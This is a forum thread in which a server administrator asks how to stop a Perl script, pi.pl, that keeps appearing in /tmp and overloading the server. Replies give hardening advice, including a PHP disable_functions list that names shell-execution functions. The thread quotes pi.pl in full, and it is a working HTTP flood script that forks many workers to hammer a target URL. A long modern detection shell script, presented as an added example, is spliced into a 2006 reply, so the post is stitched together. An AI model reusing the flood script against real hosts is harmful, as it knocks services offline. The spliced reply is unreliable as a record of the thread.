The Community Forums


perl script in tmp folder causing server to crash

Discussion in 'General Discussion' started by mher, Jul 11, 2006.

  1. mher

    mher Well-Known Member

    Joined:
    Jun 14, 2004
    Messages:
    49
    Likes Received:
    0
    Trophy Points:
    6
    Hello,

    Every few hours someone is uploading a perl script to my tmp directory and running it, causing the server to overload. The file is pi.pl and I don't know how to trace it. I just kill the process to stop it and bring the server load back to normal.

    I tried searching the domlogs for pi.pl but found nothing. I also added these rules to mod_security:
    SecFilterSelective THE_REQUEST "tmp "
    SecFilterSelective THE_REQUEST "pi.pl "

    but it's happening again. I don't know how to stop this. Any thoughts?

    The content of pi.pl is this:

    #!/usr/bin/perl
    use LWP::UserAgent;
    use Time::localtime;
    my $d=localtime(time);
    $s1=$d->yday();
    $s2=$d->hour();
    $s3=$d->min();
    $s=((($s1*24)+$s2)*60)+$s3;
    while (1){
    for ($i=1;$i<=$ARGV[1];$i++){
    my $d=localtime(time);
    $s1=$d->yday();
    $s2=$d->hour();
    $s3=$d->min();
    $e=((($s1*24)+$s2)*60)+$s3;
    if (($e-$s)>$ARGV[2]) {
    killpidz();
    exit;
    }
    if ($pid=fork()){
    push(@forked,$pid);
    }else{
    $browser = LWP::UserAgent->new;
    $browser->timeout(5);
    $res=$browser->get($ARGV[0]);
    $data=$res->content;
    exit;
    }}
    killpidz();
    }
    sub killpidz {
    foreach (@forked) {
    chomp;
    waitpid($_,0);
    kill("TERM" => $_)
    }
    undef @forked;
    }
    exit;
     
  2. NightStorm

    NightStorm Well-Known Member

    Joined:
    Jul 28, 2003
    Messages:
    286
    Likes Received:
    4
    Trophy Points:
    18
    cPanel Access Level:
    Root Administrator
    Mounting /tmp with noexec is one option... although, if they are executing the code with a full path, it will still run (most kiddies have figured this out by now).

    Harden your php... run in safe_mode, set your open_basedir through "Tweak Security" properly, and use the "disable_functions" setting in your php.ini. I have mine set to "dl,system,exec,passthru,shell_exec".

    chmod 750 /usr/bin/rcp
    chmod 750 /usr/bin/wget
    chmod 750 /usr/bin/lynx
    chmod 750 /usr/bin/links
    chmod 750 /usr/bin/scp

    Lock down your mod_security. There is an extensive list of mod_sec rules here on the forum. Run a search for mod_security and they will come up.

    Compile PHP to use phpSUexec. This will force the files to run as their owners, instead of as nobody. This may not exactly stop the files from ending up in your /tmp folder, but it WILL assign them to the owner that put them there, and allow you to easily track down the site responsible.

    Check for easily exploitable systems like phpBB installed on the server. If there are any, ensure they are up to date on the latest patches and security fixes. Some site admins get lazy about this, and it causes the server owners nothing but headaches.

    There are a few posts around here about how to secure your server. I suggest checking into them... and I seriously suggest looking into Chirpy's cPanel Firewall module. It rocks hard, and has settings that will tell you when rogue scripts start causing trouble, and will even tell you who owns them, and what files they are using to run. ;)
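    The two things NightStorm's reply keeps coming back to are finding out which account a rogue /tmp script belongs to, and the caveat that a noexec /tmp does not stop "perl /tmp/pi.pl". The script below is an added example written for this thread; it is not code from the thread, from cPanel, or from Chirpy's firewall module. It assumes `ps -eo pid,user,ppid,args --no-headers` column order on stdin, a directory list of /tmp, /var/tmp and /dev/shm, and /proc for the cwd lookup; the ps and mount lines it ships with are constructed sample data, not captured from a real server.

```shell
#!/bin/sh
# Added example (not from the thread, not cPanel or CSF code): spot processes that are
# running a script out of a world-writable scratch directory, the way pi.pl was, and
# report who owns them and where they were started from.
# Input is the output of `ps -eo pid,user,ppid,args --no-headers`, so it can be run
# offline on captured lines; on a live box pipe real ps output into it.

# Directories the web-server user can normally write to; extend as needed (assumption).
SUSPECT_DIRS="/tmp /var/tmp /dev/shm"

# /proc root is a variable so the cwd lookup can be redirected (or disabled) in tests.
PROC="${PROC:-/proc}"

# flag_tmp_procs: read ps lines on stdin, print one line per process whose argument
# list references a path under one of SUSPECT_DIRS. The path must start an argument
# (start of args or after a space), so "--tmpdir=/var/tmp/x" is not counted: that is
# an option value, not a script being executed.
flag_tmp_procs() {
    while read -r pid user ppid args; do
        [ -n "$pid" ] || continue
        for d in $SUSPECT_DIRS; do
            case "$args" in
                "$d/"*|*" $d/"*)
                    # cwd from /proc shows which account's directory the process was launched in,
                    # which is usually the site whose web app was abused to drop the script.
                    cwd=$(readlink "$PROC/$pid/cwd" 2>/dev/null || echo '?')
                    printf 'pid=%s user=%s ppid=%s cwd=%s cmd=%s\n' "$pid" "$user" "$ppid" "$cwd" "$args"
                    break
                    ;;
            esac
        done
    done
}

# tmp_is_noexec: given /proc/mounts-style lines on stdin, return 0 if /tmp is mounted
# with noexec. NightStorm's caveat applies: noexec stops "/tmp/pi.pl" from running
# directly, but not "perl /tmp/pi.pl", which is exactly the case flag_tmp_procs catches.
tmp_is_noexec() {
    while read -r dev mnt fstype opts rest; do
        if [ "$mnt" = "/tmp" ]; then
            case ",$opts," in
                *,noexec,*) return 0 ;;
                *) return 1 ;;
            esac
        fi
    done
    return 1
}

# Constructed sample ps output (not real data): two pi.pl workers running as 'nobody',
# Apache, and mysqld with a /var/tmp path that appears only as an option value.
SAMPLE_PS='1234 nobody 1 perl /tmp/pi.pl http://target.example/ 50 10
1236 nobody 1234 perl /tmp/pi.pl http://target.example/ 50 10
1235 root 1 /usr/sbin/httpd -k start
1237 mysql 1 /usr/sbin/mysqld --tmpdir=/var/tmp/mysql'

# Constructed mount lines (not real data).
SAMPLE_MOUNTS_NOEXEC='/dev/sda3 /tmp ext3 rw,noexec,nosuid 0 0'
SAMPLE_MOUNTS_EXEC='/dev/sda3 /tmp ext3 rw 0 0'

# Demo on the sample; on a real server replace the printf with
#   ps -eo pid,user,ppid,args --no-headers
printf '%s\n' "$SAMPLE_PS" | flag_tmp_procs
if cat /proc/mounts 2>/dev/null | tmp_is_noexec; then
    echo "/tmp is noexec (direct execution blocked; interpreter-launched scripts still run)"
else
    echo "/tmp is not noexec, or no /proc/mounts available"
fi
```

    Run it from cron or from the same place you currently kill the process: the `user=` field tells you immediately whether the script runs as nobody (shared Apache) or as a specific account (phpSUexec), and `cwd=` usually points straight at the site whose web application was abused. With phpSUexec in place, as the reply recommends, the owner field alone identifies the responsible account.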
     
  3. mher

    mher Well-Known Member

    Joined:
    Jun 14, 2004
    Messages:
    49
    Likes Received:
    0
    Trophy Points:
    6
    Thank you. Is there a way to disable LWP::UserAgent in perl?
     
  4. katmai

    katmai Well-Known Member

    Joined:
    Mar 13, 2006
    Messages:
    526
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Brno, Czech Republic
    I suggest an admin remove the code, just because we don't know who might browse the forum...
     
  5. avijit

    avijit Well-Known Member

    Joined:
    Jul 26, 2004
    Messages:
    116
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    India
    Install mod_sec and add a moderate mod_sec ruleset to prevent this.
     
  6. Marty

    Marty Well-Known Member

    Joined:
    Oct 10, 2001
    Messages:
    630
    Likes Received:
    1
    Trophy Points:
    18
    I think if you read the poster's post, you will find that he has already done that.
     